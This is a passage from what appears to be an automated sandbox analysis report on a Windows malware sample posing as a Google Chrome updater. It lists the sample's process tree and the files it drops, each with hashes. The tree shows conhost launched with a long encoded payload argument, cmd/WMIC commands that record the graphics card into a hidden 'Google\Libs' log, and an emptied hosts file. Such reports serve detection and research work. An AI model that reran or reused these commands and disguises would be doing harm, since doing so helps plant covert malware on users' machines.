Files\Google\Chrome\updater.exe' }
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
  - [2] C:\Windows\system32\conhost.exe
    Command: C:\Windows\system32\conhost.exe dyaqxbmsoinnnm
    - [3] C:\Windows\system32\cmd.exe
      Command: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
      - [4] C:\Windows\System32\Wbem\WMIC.exe
        Command: wmic PATH Win32_VideoController GET Name, VideoProcessor
  - [2] C:\Windows\system32\cmd.exe
    Command: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    - Drops file in Program Files directory
  - [2] C:\Windows\system32\conhost.exe
    Command: C:\Windows\system32\conhost.exe ugxlnakznvqhxgmt GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1mD4z/F1I8voeixdh9ABkSX5OmiklgByXQ8r/0t6T+lh
    - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files\Google\Chrome\updater.exe
Filesize: 7.9MB
MD5: 4219fd31abeed331b5459aded2b24a39
SHA1: acbd8bcdff673b3dceffa7ae26c462ee5e030a70
SHA256: 18f3a9fc3b3fe7123e424941cae2c9d731f189db686c46e7a484579c69aef62d
SHA512: e08340590aa827875b4b479018a1170d176df4b52e08ceebb55337707990993fe954cfa1b79d91ca84e6628ade8c19a874d94a51274a68d60254a63297a71173
-
C:\Program Files\Google\Libs\g.log
Filesize: 226B
MD5: fdba80d4081c28c65e32fff246dc46cb
SHA1: 74f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256: b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512: b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 2KB
MD5: d85ba6ff808d9e5444a4b369f5bc2730
SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
MD5: 531f08ac3a06c5a3a09412a10fd95626
SHA1: ad756b5c27e710d81ece8a6d4fe865230cdc2bbf
SHA256: 793902b936877a86b5d46d629a1c6d8c68ac8d42981788ddd4ede0f3381af6b0
SHA512: ac8c608fae29fa780400ac84e79b86c4a34ee7068f4f2c8056e4a2209a3ba62ae7716eaea2924e8412eab38ad003d59d4538d675019e50f15b3571e14c52fa73
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: a084085c1e171dbcbc9b3ca36ca51413
SHA1: 32c74da1846ed93dc1ed808e3f9d8b6ea9c6ef82
SHA256: 5c63127c8c26c21cb39edbafcaa7c4cc18be20fa8bcc7e46968e67b80a94bc64
SHA512: 3e51800a8069e14afcd30486a1291b87255d87dd0cd2d4b583f02b440886dbddb7f590ae06a12503df079eccad4ef353bb13920ec0b3ded5ee936d43900bd455
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 4KB
MD5: bdb25c22d14ec917e30faf353826c5de
SHA1: 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256: e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512: b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: b42c70c1dbf0d1d477ec86902db9e986
SHA1: 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256: 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512: 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\drivers\etc\hosts
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-